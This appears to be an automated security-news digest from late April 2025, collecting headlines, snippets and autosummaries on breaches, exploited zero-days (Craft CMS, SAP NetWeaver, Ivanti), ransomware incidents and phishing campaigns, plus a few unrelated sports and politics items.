    2025-04-29 https://www.bleepingcomputer.com/news/security/sk-telecom-cyberattack-free-sim-replacements-for-25-million-customers/
    South Korean mobile provider SK Telecom has announced free SIM card replacements to its 25 million mobile customers following a recent USIM data breach, but only 6 million cards are available through May. [...] "

    Autosummary: "


    44% of the zero-days exploited in 2024 were in enterprise solutions

    exploits
    2025-04-29 https://www.helpnetsecurity.com/2025/04/29/44-of-the-zero-days-exploited-in-2024-were-in-enterprise-solutions/

    In 2024, threat actors exploited 75 zero-days – i.e., vulnerabilities previously unknown to vendors, thus without a readily available patch – in a wide variety of attacks. Of these, 33 vulnerabilities (44%) affected enterprise solutions, which is up from 37% in 2023, according to Google Threat Intelligence Group researchers. “Zero-day vulnerabilities in security software and appliances were a high-value target in 2024. We identified 20 security and networking vulnerabilities, which was over 60% of all … More

    The post 44% of the zero-days exploited in 2024 were in enterprise solutions appeared first on Help Net Security.

    "

    Autosummary: Advice for vendors: The most frequent types of zero-day vulnerabilities exploited in 2024 were use-after-free, command/code injection, and cross-site scripting vulnerabilities, and these can be prevented by prioritizing higher coding standards and preventative practices such as regular code reviews, refactoring outdated codebases, and relying on up-to-date, trusted libraries, the researchers noted. "


    Ransomware attacks are getting smarter, harder to stop

    exploits
    2025-04-28 https://www.helpnetsecurity.com/2025/04/28/companies-impacted-ransomware-attacks/

    Ransomware attacks are becoming more refined and pervasive, posing significant challenges to organizations globally. A Veeam report reveals that while the percentage of companies impacted by ransomware attacks has slightly declined from 75% to 69%, the threat remains substantial. This decrease is attributed to improved preparation and resilience practices, as well as increased collaboration between IT and security teams. However, as ransomware attacks from both established groups and “lone wolf” actors proliferate, organizations must adopt … More

    The post Ransomware attacks are getting smarter, harder to stop appeared first on Help Net Security.

    "

    Autosummary: Pre-attack confidence among ransomware victims often doesn’t reflect reality, as 69% believed they were prepared before being attacked, while their confidence plummeted by over 20% afterward, revealing significant gaps in planning. Notably, CIOs experienced a 30% decline in their preparedness rating post-attack, compared to a 15% drop for CISOs, suggesting that CISOs have a clearer grasp of their organization’s security posture. "


    Hackers Exploit Critical Craft CMS Flaws; Hundreds of Servers Likely Compromised

    exploits
    2025-04-28 https://thehackernews.com/2025/04/hackers-exploit-critical-craft-cms.html
    Threat actors have been observed exploiting two newly disclosed critical security flaws in Craft CMS in zero-day attacks to breach servers and gain unauthorized access. The attacks, first observed by Orange Cyberdefense SensePost on February 14, 2025, involve chaining the below vulnerabilities - CVE-2024-58136 (CVSS score: 9.0) - An improper protection of alternate path flaw in the Yii PHP "

    Autosummary: (CVSS score: 9.0) - An improper protection of alternate path flaw in the Yii PHP framework used by Craft CMS that could be exploited to access restricted functionality or resources (A regression of CVE-2024-4990) CVE-2025-32432 (CVSS score: 10.0) - A remote code execution (RCE) vulnerability in Craft CMS (Patched in versions 3.9.15, 4.14.15, and 5.6.17) According to the cybersecurity company, CVE-2025-32432 resides in a built-in image transformation feature that allows site administrators to keep images to a certain format. "


    Critical SAP NetWeaver flaw exploited by suspected initial access broker (CVE-2025-31324)

    exploits
    2025-04-28 https://www.helpnetsecurity.com/2025/04/28/sap-netweaver-cve-2025-31324-exploited/

    CVE-2025-31324, a critical vulnerability in the SAP NetWeaver platform, is being actively exploited by attackers to upload malicious webshells to enable unauthorized file uploads and code execution. The vulnerability was initially leveraged in zero-day attacks spotted by ReliaQuest researchers, who reported them to SAP. The software company confirmed that the attackers have been leveraging a new vulnerability; released an emergency patch on April 24; and urged organizations to upgrade to implement it and check whether … More

    The post Critical SAP NetWeaver flaw exploited by suspected initial access broker (CVE-2025-31324) appeared first on Help Net Security.

    "

    Autosummary: About the attacks: ReliaQuest investigated the attacks after several of its customers were hit this month, and discovered that the attackers: uploaded .jsp webshells (e.g., helper.jsp or cache.jsp) into the j2ee/cluster/apps/sap.com/irj/servletjsp/irj/root/ directory; fired off a GET request to execute them; and used the Brute Ratel tool and the Heaven’s Gate technique to establish command and control communication, effect post-exploitation actions, and avoid detection by endpoint security solutions. "


    WooCommerce Users Targeted by Fake Patch Phishing Campaign Deploying Site Backdoors

    financial
    2025-04-28 https://thehackernews.com/2025/04/woocommerce-users-targeted-by-fake.html
    Cybersecurity researchers are warning about a large-scale phishing campaign targeting WooCommerce users with a fake security alert urging them to download a "critical patch" but deploy a backdoor instead. WordPress security company Patchstack described the activity as sophisticated and a variant of another campaign observed in December 2023 that employed a fake CVE ploy to breach sites running "

    Autosummary: "


    PoC rootkit Curing evades traditional Linux detection systems

    Linux
    2025-04-28 https://securityaffairs.com/177098/hacking/poc-rootkit-curing-evades-traditional-linux-detection-systems.html
    Researchers created a PoC rootkit called Curing that uses Linux’s io_uring feature to evade traditional system call monitoring. Armo researchers have demonstrated a proof-of-concept (PoC) rootkit named Curing that relies on Linux asynchronous I/O mechanism io_uring to bypass traditional system call monitoring. “Curing is a POC of a rootkit that uses io_uring to perform different tasks without using any syscalls, […] "

    Autosummary: “Today, many security vendors are shifting towards building eBPF-based agents, largely because eBPF is considered “safe” for use in products like EDR and CWPP.” concludes the report. "


    Attackers chained Craft CMS zero-days attacks in the wild

    exploits
    2025-04-28 https://securityaffairs.com/177085/hacking/attackers-chained-craft-cms-zero-days-attacks-in-the-wild.html
    Orange Cyberdefense’s CSIRT reported that threat actors exploited two vulnerabilities in Craft CMS to breach servers and steal data. Orange Cyberdefense’s CSIRT warns that threat actors chained two Craft CMS vulnerabilities in recent attacks. Orange experts discovered the flaws while investigating a server compromise. The two vulnerabilities, tracked as CVE-2025-32432 and CVE-2024-58136, are respectively a […] "

    Autosummary: This vulnerability has been reported by Orange Cyberdefense a month ago after our CSIRT investigated a case where two 0-day vulnerabilities have been exploited 1/6 https://t.co/ndHdjHFyYj — CERT Orange Cyberdefense (@CERTCyberdef) April 25, 2025. The two vulnerabilities, tracked as CVE-2025-32432 and CVE-2024-58136, are respectively a remote code execution (RCE) in Craft CMS and an input validation flaw in the Yii framework used by Craft CMS. "


    Avocado OS: Open-source Linux platform for embedded systems

    Linux
    2025-04-28 https://www.helpnetsecurity.com/2025/04/28/avocado-os-open-source-linux-embedded-systems/

    Peridio, a platform for building and maintaining advanced embedded products, has launched Avocado OS, an open-source embedded Linux distribution made to simplify the way developers build complex embedded systems. Avocado OS focuses on delivering a smooth developer experience while offering security, reliability, and consistent performance. A new answer to an old problem Teams building with traditional Embedded Linux often face a tough choice. They must pick between developer-friendly systems that move fast, or production systems … More

    The post Avocado OS: Open-source Linux platform for embedded systems appeared first on Help Net Security.

    "

    Autosummary: Avocado OS delivers critical capabilities without forcing tradeoffs: immutable and deterministic runtimes, fault-tolerance, modular update mechanisms, simplified secure boot implementation, full disk encryption, and boot modes for manufacturing, recovery, and testing. "


    ⚡ Weekly Recap: Critical SAP Exploit, AI-Powered Phishing, Major Breaches, New CVEs & More

    financial exploits
    2025-04-28 https://thehackernews.com/2025/04/weekly-recap-critical-sap-exploit-ai.html
    What happens when cybercriminals no longer need deep skills to breach your defenses? Today’s attackers are armed with powerful tools that do the heavy lifting — from AI-powered phishing kits to large botnets ready to strike. And they’re not just after big corporations. Anyone can be a target when fake identities, hijacked infrastructure, and insider tricks are used to slip past security

    Autosummary: This week's list includes — CVE-2024-58136, CVE-2025-32432 (Craft CMS), CVE-2025-31324 (SAP NetWeaver), CVE-2025-27610 (Rack), CVE-2025-34028 (Commvault Command Center), CVE-2025-2567 (Lantronix Xport), CVE-2025-33028 (WinZip), CVE-2025-21204 (Microsoft Windows), CVE-2025-1021 (Synology DiskStation Manager), CVE-2025-0618 (FireEye EDR Agent), CVE-2025-1763 (GitLab), CVE-2025-32818 (SonicWall SonicOS), CVE-2025-3248 (Langflow), CVE-2025-21605 (Redis), CVE-2025-23249, CVE-2025-23250, and CVE-2025-23251 (NVIDIA NeMo Framework), CVE-2025-22228 (Spring Framework, NetApp), and CVE-2025-3935 (ScreenConnect).
    Power Parasites Goes After Bangladesh, Nepal, India — An active campaign is targeting individuals across Asian countries, including Bangladesh, Nepal, and India, with job and investment scams via a combination of deceptive websites masquerading as energy firms and other major firms, social media groups, YouTube videos, and Telegram channels since September 2024.
    In recent months, a cyber espionage campaign known as Operation Cobalt Whisper has targeted multiple industries in Hong Kong and Pakistan, including defense, education, environmental engineering, electrotechnical engineering, energy, cybersecurity, aviation and healthcare, with phishing emails that serve as a conduit to deliver Cobalt Strike.
    How Windows PC Manager Could Be Hijacked — Cybersecurity researchers have outlined two scenarios where releases associated with the PC Manager tool, a software designed to help optimize and manage Windows computers, could have been hijacked by attackers via WinGet repository (ZDI-23-1527), "aka.ms" URLs, and the official "pcmanager.microsoft[.]com" subdomain of Microsoft (ZDI-23-1528), due to overly permissive Shared Access Signature (SAS) tokens. "If an attack had been carried out, cybercriminals could have compromised software supply chains for distribution of malware, allowed them to replace software releases, and alter distributed PC Manager executables," Trend Micro said.
    📰 Around the Cyber World
    Lumma Stealer Adopts New Tricks to Evade Detection — The information stealer known as Lumma, which has been advertised as a Malware-as-a-Service (MaaS) starting at $250 a month, is being distributed extensively using various methods such as pirated media, adult content, and cracked software sites, as well as fake Telegram channels for such content to redirect users to fraudulent CAPTCHA verifications that leverage the ClickFix tactic to trick users into downloading and running the malware via PowerShell and MSHTA commands.
    Also addressed by Kentico are three other vulnerabilities, WT-2025-0006 (authentication bypass), WT-2025-0007 (post-authentication remote code execution), and WT-2025-0011 (authentication bypass), that can achieve remote code execution against fully-patched deployments.
    Several Extensions Found with Risky Features — Fifty-eight suspicious Google Chrome extensions have been discovered containing risky features, such as monitoring browsing behavior, accessing cookies for domains, altering search providers, and potentially executing remote scripts, according to Secure Annex researcher John Tuckner.
    "To set the record straight, there was no funding issue, but rather a contract administration issue that was resolved prior to a contract lapse," Matt Hartman, CISA Acting Executive Assistant Director for Cybersecurity, said.
    "The dispersal of these sophisticated criminal networks within areas of weakest governance has attracted new players, benefited from and fueled corruption, and enabled the illicit industry to continue to scale and consolidate, culminating in hundreds of industrial-scale scam centres generating just under US $40 billion in annual profits," the UNODC said.
    Indian Banks Ordered to Migrate to ".bank[.]in" Domains by October 31 — In February 2025, India's central bank, the Reserve Bank of India (RBI), introduced an exclusive ".bank[.]in" internet domain for banks in the country to combat digital financial fraud.
    Over 50% of the compromised devices are located in Brazil, followed by Argentina, Russia, Iraq, and Mexico, per Qrator Labs.
    Hong Kong, Vietnam, Mexico, the Philippines, India, and China were the main international destinations for fraudulent wire transactions.
    The threat actors behind the Darcula phishing-as-a-service (PhaaS) platform have released new updates to their cybercrime suite with generative artificial intelligence (GenAI) capabilities to facilitate phishing form generation in various languages, form field customization, and translation of phishing forms into local languages.
    In this session, you'll learn how to stop identity-based attacks before they start, using real-time verification, access checks, and advanced deepfake detection.


    A large-scale phishing campaign targets WordPress WooCommerce users

    financial
    2025-04-28 https://securityaffairs.com/177115/hacking/a-large-scale-phishing-campaign-targets-wordpress-woocommerce-users.html
    A large-scale phishing campaign targets WordPress WooCommerce users with a fake security alert urging them to download a ‘critical patch’ hiding a backdoor. Patchstack researchers uncovered a large-scale phishing campaign targeting WordPress WooCommerce users with a fake security alert. Threat actors urge recipients to download a “critical patch” that hides a backdoor. The experts noted […]

    Autosummary: Additionally, the compromised site generates outbound HTTP requests to attacker-controlled domains, including woocommerce-services[.]com, woocommerce-api[.]com, and woocommerce-help[.]com.


    M&S customers in limbo as cyber attack chaos continues

    ransomware
    2025-04-28 https://www.bbc.com/news/articles/cyvq0q14y03o
    The retail giant's online business remains suspended with no indication yet when it will be restored.

    Autosummary: "In situations like this, in-store services are typically prioritised for recovery, which can mean online operations take slightly longer to restore," said Sam Kirkman, a director at cyber-security firm NetSPI. Ms Cunnington said she received a refund and a £10 apology voucher after calling M&S to find out what happened to the flowers, but was "a bit cross" they had allowed her to place the order in the first place, given it was aware of the cyber incident.


    Hitachi Vantara takes servers offline after Akira ransomware attack

    exploits ransomware
    2025-04-28 https://www.bleepingcomputer.com/news/security/hitachi-vantara-takes-servers-offline-after-akira-ransomware-attack/
    Hitachi Vantara, a subsidiary of Japanese multinational conglomerate Hitachi, was forced to take servers offline over the weekend to contain an Akira ransomware attack. [...]

    Autosummary: The company provides data storage, infrastructure systems, cloud management, and ransomware recovery services to government entities and some of the world's biggest brands, including BMW, Telefónica, T-Mobile, and China Telecom.


    VeriSource now says February data breach impacts 4 million people

    financial
    2025-04-28 https://www.bleepingcomputer.com/news/security/verisource-now-says-february-data-breach-impacts-4-million-people/
    Employee benefits administration firm VeriSource Services is warning that a data breach exposed the personal information of four million people. [...]


    Over 1,200 SAP NetWeaver servers vulnerable to actively exploited flaw

    exploits
    2025-04-28 https://www.bleepingcomputer.com/news/security/over-1-200-sap-netweaver-servers-vulnerable-to-actively-exploited-flaw/
    Over 1,200 internet-exposed SAP NetWeaver instances are vulnerable to an actively exploited maximum severity unauthenticated file upload vulnerability that allows attackers to hijack servers. [...]

    Autosummary: Most of the vulnerable systems (149) are in the United States, followed by India (50), Australia (37), China (31), Germany (30), the Netherlands (13), Brazil (10), and France (10).


    Kali Linux warns of update failures after losing repo signing key

    Linux
    2025-04-28 https://www.bleepingcomputer.com/news/linux/kali-linux-warns-of-update-failures-after-losing-repo-signing-key/
    Offensive Security warned Kali Linux users to manually install a new Kali repository signing key to avoid experiencing update failures. [...]

    Autosummary: To avoid experiencing these update issues, OffSec advises users to manually download and install the new repository signing key using the following command:
    sudo wget https://archive.kali.org/archive-keyring.gpg -O /usr/share/keyrings/kali-archive-keyring.gpg
    OffSec also provides details on how to check that the checksum of the file matches and view the contents of the updated keyring.


    Marks & Spencer breach linked to Scattered Spider ransomware attack

    exploits ransomware
    2025-04-28 https://www.bleepingcomputer.com/news/security/marks-and-spencer-breach-linked-to-scattered-spider-ransomware-attack/
    Ongoing outages at British retail giant Marks & Spencer are caused by a ransomware attack believed to be conducted by a hacking collective known as "Scattered Spider", BleepingComputer has learned from multiple sources. [...]

    Autosummary: Scattered Spider, also known as 0ktapus, Starfraud, UNC3944, Scatter Swine, Octo Tempest, and Muddled Libra, is a group of threat actors that are adept at using social engineering attacks, phishing, multi-factor authentication (MFA) bombing (targeted MFA fatigue), and SIM swapping to gain initial network access on large organizations. Researchers commonly associate attacks with the Scattered Spider group based on specific indicators of compromise, including credential-stealing phishing attacks targeting SSO platforms, social engineering attacks impersonating the IT help desk, and other tactics.


    The Turmoil Following BreachForums Shutdown: Confusion, Risks, and a New Beginning

    industry
    2025-04-28 https://securityaffairs.com/177146/hacking/the-turmoil-following-breachforums-shutdown-confusion-risks-and-a-new-beginning.html
    BreachForums, a major data leak marketplace, shut down on April 15 after a MyBB 0-day exploit allowed law enforcement infiltration. On April 15, BreachForums, one of the top marketplaces for stolen data, abruptly shut down, fueling widespread speculation. Rumors ranged from FBI raids to the arrest of the administrator. In the aftermath, several alternative forums […]

    Autosummary: The Turmoil Following BreachForums Shutdown: Confusion, Risks, and a New Beginning, by Pierluigi Paganini, April 28, 2025. BreachForums, a major data leak marketplace, shut down on April 15 after a MyBB 0-day exploit allowed law enforcement infiltration.


    Earth Kurma APT is actively targeting government and telecommunications orgs in Southeast Asia

    government Telcos
    2025-04-28 https://securityaffairs.com/177125/apt/earth-kurma-apt-is-actively-targeting-government-and-telecommunications-orgs-in-southeast-asia.html
    Earth Kurma APT carried out a sophisticated campaign against government and telecommunications sectors in Southeast Asia. Trend Research exposed the Earth Kurma APT campaign targeting Southeast Asia’s government and telecom sectors. Threat actors use custom malware, rootkits, and cloud storage for espionage, credential theft, and data exfiltration, posing a high business risk with advanced evasion […]

    Autosummary: Below is the infection chain and malware used by the group: Earth Kurma used tools like NBTSCAN, Ladon, FRPC, WMIHACKER, and ICMPinger for lateral movement, network scanning, and malware deployment. Threat actors use custom malware, rootkits, and cloud storage for espionage, credential theft, and data exfiltration, posing a high business risk with advanced evasion techniques.


    What is bug hunting and why is it changing?

    exploits
    2025-04-28 https://www.bbc.com/news/articles/c99n8r38rdlo
    Bug hunters make money by finding flaws in software, but AI is changing the way they work.

    Autosummary: Since opening its bug bounty programme, Axis has uncovered – and patched – as many as 30 vulnerabilities, says Mr Bastert, including one "we deem very severe". But while there are millions of hackers registered on the key platforms, Inti De Ceukelaire, chief hacking officer at Intigriti, says the number hunting on a daily or weekly basis is "tens of thousands."


    Week in review: MITRE ATT&CK v17.0 released, PoC for Erlang/OTP SSH bug is public

    exploits
    2025-04-27 https://www.helpnetsecurity.com/2025/04/27/week-in-review-mitre-attck-v17-0-released-poc-for-erlang-otp-ssh-bug-is-public/

    Here’s an overview of some of last week’s most interesting news, articles, interviews and videos:
    Released: MITRE ATT&CK v17.0, now with ESXi attack TTPs
    MITRE has released the latest version of its ATT&CK framework, which now also includes a new section (“matrix”) to cover the tactics, techniques and procedures (TTPs) used to target VMware ESXi hypervisors.
    PoC exploit for critical Erlang/OTP SSH bug is public (CVE-2025-32433)
    There are now several public proof-of-concept (PoC) exploits for … More

    The post Week in review: MITRE ATT&CK v17.0 released, PoC for Erlang/OTP SSH bug is public appeared first on Help Net Security.

    Autosummary: New infosec products of the week: April 25, 2025. Here’s a look at the most interesting products from the past week, featuring releases from Bitdefender, PowerDMARC, Skyhawk Security, Stellar Cyber, Swimlane, and Veracode.


    SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 43

    exploits
    2025-04-27 https://securityaffairs.com/177060/malware/security-affairs-malware-newsletter-round-43.html
    Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape:
    Inside Gamaredon’s PteroLNK: Dead Drop Resolvers and evasive Infrastructure
    XRP supply chain attack: Official NPM package infected with crypto stealing backdoor
    SuperCard X: exposing a Chinese-speaker MaaS for NFC Relay fraud operation
    New Rust Botnet “RustoBot” […]


    Real Madrid boss Ancelotti set for Brazil talks

    latam
    2025-04-27 https://www.bbc.com/sport/football/articles/cy4v21ze8plo
    Real Madrid boss Carlo Ancelotti is set to meet Brazilian Football Federation representatives for more talks about taking over as Brazil coach before the June World Cup qualifiers.


    ToyMaker Uses LAGTOY to Sell Access to CACTUS Ransomware Gangs for Double Extortion

    exploits ransomware
    2025-04-26 https://thehackernews.com/2025/04/toymaker-uses-lagtoy-to-sell-access-to.html
    Cybersecurity researchers have detailed the activities of an initial access broker (IAB) dubbed ToyMaker that has been observed handing over access to double extortion ransomware gangs like CACTUS. The IAB has been assessed with medium confidence to be a financially motivated threat actor, scanning for vulnerable systems and deploying a custom malware called LAGTOY (aka HOLERUN). "LAGTOY can be

    Autosummary: "ToyMaker is a financially-motivated initial access broker (IAB) who acquires access to high-value organizations and then transfers that access to secondary threat actors who usually monetize the access via double extortion and ransomware deployment," the company said.


    CEO of cybersecurity firm charged with installing malware on hospital systems

    exploits ciber
    2025-04-26 https://securityaffairs.com/177020/cyber-crime/ceo-of-cybersecurity-firm-charged-with-installing-malware-on-hospital-systems.html
    Veritaco CEO Jeffrey Bowie faces charges for allegedly installing malware on hospital computers, violating Oklahoma’s Computer Crimes Act. Jeffrey Bowie, CEO of the cybersecurity firm Veritaco, is facing two counts of violating Oklahoma’s Computer Crimes Act for allegedly infecting employee computers at the Oklahoma City St. Anthony Hospital. The man is accused of having installed […]

    Autosummary: The hospital offers a wide range of services, including cardiology, oncology, neurology, behavioral medicine, surgery, and kidney transplantation.


    African multinational telco giant MTN Group disclosed a data breach

    financial Telcos
    2025-04-26 https://securityaffairs.com/177037/security/african-multinational-telco-giant-mtn-disclosed-a-data-breach.html
    African multinational telecommunications company MTN Group disclosed a data breach that exposed subscribers’ personal information. MTN Group Limited is a South African multinational telecommunications company headquartered in Johannesburg. Founded in 1994, it has grown to become Africa’s largest mobile network operator, serving over 290 million subscribers across 18 countries in Africa and the Middle East. […]

    Autosummary: Compromised data includes full names, contact details, ID numbers, banking information, driver’s license numbers, medical records and passport details.


    DragonForce expands ransomware model with white-label branding scheme

    exploits ransomware
    2025-04-26 https://www.bleepingcomputer.com/news/security/dragonforce-expands-ransomware-model-with-white-label-branding-scheme/
    The ransomware scene is re-organizing, with one gang known as DragonForce working to gather other operations under a cartel-like structure. [...]

    Autosummary: Under its model, affiliates get access to the infrastructure (negotiation tools, storage for stolen data, malware administration), and use the DragonForce encryptor under their own branding.


    Woman who used lipstick to write on statue during Brazil unrest jailed for 14 years

    latam
    2025-04-26 https://www.bbc.com/news/articles/c62x6qx682jo
    The Bolsonaro supporter, who drew in lipstick on a statue during riots, has been jailed for taking part in an alleged coup.


    13 core principles to strengthen AI cybersecurity

    ciber
    2025-04-25 https://www.helpnetsecurity.com/2025/04/25/etsi-ts-104-223-securing-ai/

    The new ETSI TS 104 223 specification for securing AI provides reliable and actionable cybersecurity guidance aimed at protecting end users. Adopting a whole-lifecycle approach, the framework outlines 13 core principles that expand into 72 detailed, trackable principles across five key phases of the AI lifecycle, all designed to enhance the overall security of AI systems. The specification details transparent, high-level principles and provisions for securing AI. It provides stakeholders in the AI supply chain—from … More

    The post 13 core principles to strengthen AI cybersecurity appeared first on Help Net Security.



    FBI seeks help to unmask Salt Typhoon hackers behind telecom breaches

    Telcos
    2025-04-25 https://www.bleepingcomputer.com/news/security/fbi-seeks-help-to-unmask-salt-typhoon-hackers-behind-telecom-breaches/
    The FBI has asked the public for information on Chinese Salt Typhoon hackers behind widespread breaches of telecommunications providers in the United States and worldwide. [...]

    Autosummary: In October, the FBI and CISA confirmed that the Chinese state hackers had breached multiple telecom providers (including AT&T, Verizon, Lumen, Charter Communications, Consolidated Communications, and Windstream) and many other telecom companies in dozens of countries.


    Hackers access sensitive SIM card data at South Korea’s largest telecoms company

    Telcos
    2025-04-25 https://www.bitdefender.com/en-us/blog/hotforsecurity/hackers-access-sensitive-sim-card-data-at-south-koreas-largest-telecoms-company
    Mobile network operator SK Telecom, which serves approximately 34 million subscribers in South Korea, has confirmed that it suffered a cyber attack earlier this month that saw malware infiltrate its internal systems, and access data related to customers' SIM cards. Read more in my article on the Hot for Security blog.

    Autosummary: Although no customer names, birth dates, or financial details were leaked, the information identifying SIM cards is considered highly sensitive, as it could permit a determined criminal to hijack victims' phone numbers in a "SIM Swap" attack.


    Rack Ruby vulnerability could reveal secrets to attackers (CVE-2025-27610)

    exploits
    2025-04-25 https://www.helpnetsecurity.com/2025/04/25/rack-ruby-vulnerability-could-reveal-secrets-to-attackers-cve-2025-27610/

    Researchers have uncovered three serious vulnerabilities in Rack, a server interface used by most Ruby web app frameworks (Ruby on Rails, Sinatra, Hanami, Roda, and others). Two of the flaws – CVE-2025-25184 and CVE-2025-27111 – could allow attackers to manipulate log content and entries, while the third one – CVE-2025-27610 – is a path traversal vulnerability that may allow attackers to gain unauthorized access to sensitive information.
    About CVE-2025-27610
    Rack provides a standardized way for … More

    The post Rack Ruby vulnerability could reveal secrets to attackers (CVE-2025-27610) appeared first on Help Net Security.

    Autosummary: Those files may include configuration files, credentials, and other confidential data, but there’s a caveat: to access the files, the attacker must be able to determine their path.


    Detectify Asset Classification and Scan Recommendations improves vulnerability testing

    exploits
    2025-04-25 https://www.helpnetsecurity.com/2025/04/25/detectify-asset-classification-and-scan-recommendations/

    Detectify announced new Asset Classification and Scan Recommendations capabilities. This innovation directly addresses a critical challenge for security teams: knowing what else, beyond their core applications, requires in-depth testing. The new features automatically classify discovered web assets based on attacker reconnaissance techniques and deliver recommendations on where to run DAST, helping organizations bridge the gap between broad and deep vulnerability testing across their entire attack surface. Security teams know they must test their main applications, … More

    The post Detectify Asset Classification and Scan Recommendations improves vulnerability testing appeared first on Help Net Security.

    Autosummary: The new capabilities include: Asset classification: Analyzes and categorizes all web assets discovered by Detectify, focusing on the presence of specific attributes that can indicate the purpose of each app (e.g., libraries, forms, body length, certain headers).


    SAP Confirms Critical NetWeaver Flaw Amid Suspected Zero-Day Exploitation by Hackers

    exploits
    2025-04-25 https://thehackernews.com/2025/04/sap-confirms-critical-netweaver-flaw.html
    Threat actors are likely exploiting a new vulnerability in SAP NetWeaver to upload JSP web shells with the goal of facilitating unauthorized file uploads and code execution. "The exploitation is likely tied to either a previously disclosed vulnerability like CVE-2017-9844 or an unreported remote file inclusion (RFI) issue," ReliaQuest said in a report published this week. The cybersecurity

    Autosummary: The flaw is assessed to be rooted in the "/developmentserver/metadatauploader" endpoint in the NetWeaver environment, enabling unknown threat actors to upload malicious JSP-based web shells in the "servlet_jsp/irj/root/" path for persistent remote access and deliver additional payloads.


    Researchers Identify Rack::Static Vulnerability Enabling Data Breaches in Ruby Servers

    financial exploits
    2025-04-25 https://thehackernews.com/2025/04/researchers-identify-rackstatic.html
    Cybersecurity researchers have disclosed three security flaws in the Rack Ruby web server interface that, if successfully exploited, could enable attackers to gain unauthorized access to files, inject malicious data, and tamper with logs under certain conditions. The vulnerabilities, flagged by cybersecurity vendor OPSWAT, are listed below - CVE-2025-27610 (CVSS score: 7.5) - A path traversal

    Autosummary: The vulnerabilities, flagged by cybersecurity vendor OPSWAT, are listed below:
    CVE-2025-27610 (CVSS score: 7.5) - A path traversal vulnerability that could be used to gain access to all files under the specified root: directory, assuming an attacker can determine the paths to those files
    CVE-2025-27111 (CVSS score: 6.9) - An improper neutralization of carriage return line feed (CRLF) sequences and improper output neutralization for logs vulnerability that could be used to manipulate log entries and distort log files
    CVE-2025-25184 (CVSS score: 5.7) -


    DslogdRAT Malware Deployed via Ivanti ICS Zero-Day CVE-2025-0282 in Japan Attacks

    exploits industry
    2025-04-25 https://thehackernews.com/2025/04/dslogdrat-malware-deployed-via-ivanti.html
    Cybersecurity researchers are warning about a new malware called DslogdRAT that's installed following the exploitation of a now-patched security flaw in Ivanti Connect Secure (ICS). The malware, along with a web shell, was "installed by exploiting a zero-day vulnerability at that time, CVE-2025-0282, during attacks against organizations in Japan around December 2024," JPCERT/CC researcher Yuma

    Autosummary: The malware, along with a web shell, was "installed by exploiting a zero-day vulnerability at that time, CVE-2025-0282, during attacks against organizations in Japan around December 2024," JPCERT/CC researcher Yuma Masubuchi said in a report published Thursday.


    Interlock ransomware gang started leaking data allegedly stolen from leading kidney dialysis firm DaVita

    exploits ransomware
    2025-04-25 https://securityaffairs.com/176946/cyber-crime/interlock-ransomware-gang-started-leaking-data-allegedly-stolen-from-leading-kidney-dialysis-firm-davita.html
    The Interlock ransomware gang claimed responsibility for the attack on the leading kidney dialysis company DaVita and leaked alleged stolen data. DaVita Inc. provides kidney dialysis services through a network of 2,675 outpatient centers in the United States, serving 200,800 patients, and 367 outpatient centers in 11 other countries, serving 49,400 patients. DaVita specializes in treating end-stage renal […]

    Autosummary: Interlock ransomware gang started leaking data allegedly stolen from leading kidney dialysis firm DaVita, by Pierluigi Paganini, April 25, 2025. The Interlock ransomware gang claimed responsibility for the attack on the leading kidney dialysis company DaVita and leaked alleged stolen data.


    Marks & Spencer pauses online orders after cyberattack

    ciber
    2025-04-25 https://www.bleepingcomputer.com/news/security/marks-and-spencer-pauses-online-orders-after-cyberattack/
    British retail giant Marks & Spencer (M&S) has suspended online orders while working to recover from a recently disclosed cyberattack. [...]

    Autosummary: The multinational retailer operates over 1,400 stores, employs 64,000 employees globally, and sells various products, including clothing, food, and home goods.


    Mobile provider MTN says cyberattack compromised customer data

    ciber
    2025-04-25 https://www.bleepingcomputer.com/news/security/mobile-provider-mtn-says-cyberattack-compromised-customer-data/
    African mobile giant MTN Group announced that a cybersecurity incident has compromised the personal information of some of its subscribers in certain countries. [...]

    Autosummary: Never share passwords, PINs, or OTPs via phone, text, or email.


    Baltimore City Public Schools data breach affects over 31,000 people

    financial government
    2025-04-25 https://www.bleepingcomputer.com/news/security/baltimore-city-public-schools-data-breach-affects-over-31-000-people/
    Baltimore City Public Schools notified tens of thousands of employees and students of a data breach following an incident in February when unknown attackers hacked into its network. [...]

    Autosummary: During the breach, the threat actors may have stolen folders, files, or records containing social security numbers, driver's license numbers, or passport numbers belonging to current and former employees, volunteers, and contractors.


    SAP fixes suspected Netweaver zero-day exploited in attacks

    exploits
    2025-04-25 https://www.bleepingcomputer.com/news/security/sap-fixes-suspected-netweaver-zero-day-exploited-in-attacks/
    SAP has released out-of-band emergency NetWeaver updates to fix a suspected remote code execution (RCE) zero-day flaw actively exploited to hijack servers. [...] "

    Autosummary: In the post-exploitation phase, the attackers deployed the "Brute Ratel" red team tool, the "Heaven's Gate" security bypassing technique, and injected MSBuild-compiled code into dllhost.exe for stealth. "


    North Korean Hackers Spread Malware via Fake Crypto Firms and Job Interview Lures

    exploits
    2025-04-25 https://thehackernews.com/2025/04/north-korean-hackers-spread-malware-via.html
    North Korea-linked threat actors behind the Contagious Interview have set up front companies as a way to distribute malware during the fake hiring process. "In this new campaign, the threat actor group is using three front companies in the cryptocurrency consulting industry—BlockNovas LLC (blocknovas[.] com), Angeloper Agency (angeloper[.]com), and SoftGlide LLC (softglide[.]co)—to spread "

    Autosummary: The use of front companies for malware propagation, complemented by setting up fraudulent accounts on Facebook, LinkedIn, Pinterest, X, Medium, GitHub, and GitLab, marks a new escalation for the threat actors, who have been observed using various job boards to lure victims. "In this new campaign, the threat actor group is using three front companies in the cryptocurrency consulting industry—BlockNovas LLC (blocknovas[.] com), Angeloper Agency (angeloper[.]com), and SoftGlide LLC (softglide[.]co)—to spread malware via "job interview lures," Silent Push said in a deep-dive analysis. "


    JPCERT warns of DslogdRAT malware deployed in Ivanti Connect Secure

    exploits
    2025-04-25 https://securityaffairs.com/177002/malware/jpcert-warns-of-dslogdrat-malware-deployed-in-ivanti-connect-secure.html
    Researchers identified a new malware, named DslogdRAT, deployed after exploiting a now-patched flaw in Ivanti Connect Secure (ICS). JPCERT/CC researchers reported that a new malware, dubbed DslogdRAT, and a web shell were deployed by exploiting a zero-day vulnerability during attacks on Japanese organizations in December 2024. The vulnerability, tracked as CVE-2025-0282 (CVSS score: 9.0), is a […] "

